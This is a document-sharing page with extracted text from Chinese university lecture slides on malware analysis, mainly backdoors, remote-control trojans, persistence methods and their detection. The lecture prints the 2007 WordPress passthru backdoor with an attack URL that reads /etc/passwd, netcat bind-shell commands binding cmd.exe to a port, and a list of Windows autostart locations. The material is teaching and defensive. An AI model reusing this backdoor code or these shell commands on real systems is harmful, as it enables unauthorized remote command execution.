欢迎来到天天文库
浏览记录
ID:39637171
大小:2.07 MB
页数:62页
时间:2019-07-07
《后门木马rootblek基本用法及防御》由会员上传分享,免费在线阅读,更多相关内容在教育资源-天天文库。
1、恶意软件的分析与防范严飞武汉大学计算机学院yanfeiclass@126.com课时安排恶意代码概述计算机病毒网络蠕虫网页/移动恶意代码后门、木马和Rootkit常用检测技术和工具课堂讨论与练习期末考试后门后门是一个允许攻击者绕过系统中常规安全控制机制的程序,他按照攻击者自己的意图提供通道。后门的重点在于为攻击者提供进入目标计算机的通道。后门类型——从功能上分类系统级后门:在系统层能访问数据和进程应用级后门:逃逸安全机制的合法程序密码级后门:能够以某种方式看懂密文后门类型——从控制方法分类本地权限的提
2、升对系统有访问权的攻击者变换其权限等级成为管理员,然后攻击者可以重新设置该系统或访问人和存储在系统中的文件。单个命令的远程执行攻击者可以向目标计算机发送消息。每次执行一个单独的命令,后门执行攻击者的命令并将输出返回给攻击者。远程命令行解释器访问如远程Shell,这类后门允许攻击者通过网络快速直接地键入受害计算机的命令提示。其比“单个命令的远程执行”要强大得多。远程控制GUI攻击者可以看到目标计算机的GUI,控制鼠标的移动,输入对键盘的操作,这些都通过网络实现。后门的安装自己植入(物理接触或入侵之后)漏
3、洞病毒蠕虫恶意移动代码社会工程(欺骗受害者自己安装)Email远程共享BT下载……Example2001年,Borland的数据库软件Interbase发现隐藏了七年的后门,程序中包含一个万能密码和用户名:用户名是“politically”密码是“correct”用户包括波音、诺基亚、摩托罗拉和波士顿股票交易所、Sun等Example2007年,Wordpress2.1.1远程命令执行后门漏洞黑客攻击了WordPress的下载网站,修改了代码如下在wp-includes/theme.php文件中:fu
4、nctionget_theme_mcommand($mcds){passthru($mcds);}...if($_GET["iz"]){get_theme_mcommand($_GET["iz"]);}passthru()会执行通过iz变量传入的PHP代码。如攻击:http://wordpressurl/wp-includes/theme.php?iz=cat/etc/passwd后门连接工具NetCat:通用的网络连接工具用法一:nc–l–p5000–ecmd.exenc127.0.0.15000用
5、法二:nc–l–p5000nc127.0.0.15000–ecmd.execshell.exe其他Windows下的后门程序CryptCatTini提供通向Tcp端口7777,只有3K。……曾经的一个优秀网站……无端口后门-如何唤醒ICMP后门不使用TCP/UDP协议。使用ICMP协议进行通信。难以检测。非混合型探测后门攻击者将触发指令发送到对方计算机。难以检测。(Cd00r:syntoportx,syntoporty,syntoportz)混合型探测后门只要攻击者将触发指令发送到对方网络中即可触发后
6、门。更加难以检测。(syntoportx,syntoportx,syntoportxindifferentIps)反弹式木马反弹式木马访问客户端的80端口,防火墙无法限制。例如,“网络神偷”GUI(GraphicsUserInterface)远程控制灰鸽子并非所有的GUI远程控制都是恶意的VNC(VirtualNetworkComputing)WindowsTerminalServicesPCAnywhereBackOrifice2000VNC英国剑桥大学AT&T实验室在2002年开发的轻量型的远程控
7、制计算机软件,任何人都可免费取得该软件。VNC软件主要由两个部分组成:VNCserver及VNCviewer。VNCserver与VNCviewer支持多种操作系统,如windows,Linux,MacOS及Unix系列(Unix,Solaris等),因此可将VNCserver及VNCviewer分别安装在不同的操作系统中进行控制。也可以通过一般的网络浏览器(如IE等)来控制被控端(需要Java虚拟机的支持)。VNC程序举例后门的启动感染普通执行文件或系统文件添加程序到“开始”-“程序”-“启动”选项
8、修改系统配置文件win.ini、system.ini、wininit.ini、winstart.bat、autoexec.bat等的相关启动选项通过修改注册表启动键值修改文件关联的打开方式添加计划任务利用自定义文件夹风格注册为Internet Explorer的BHO (Browser Helper Object)组件具体请参考“Windows的自启动方式”一文。检测Windows后门启动技术手工检测注册表启动键值启动选项关联方式计划任务…利用工具检测M
此文档下载收益归作者所有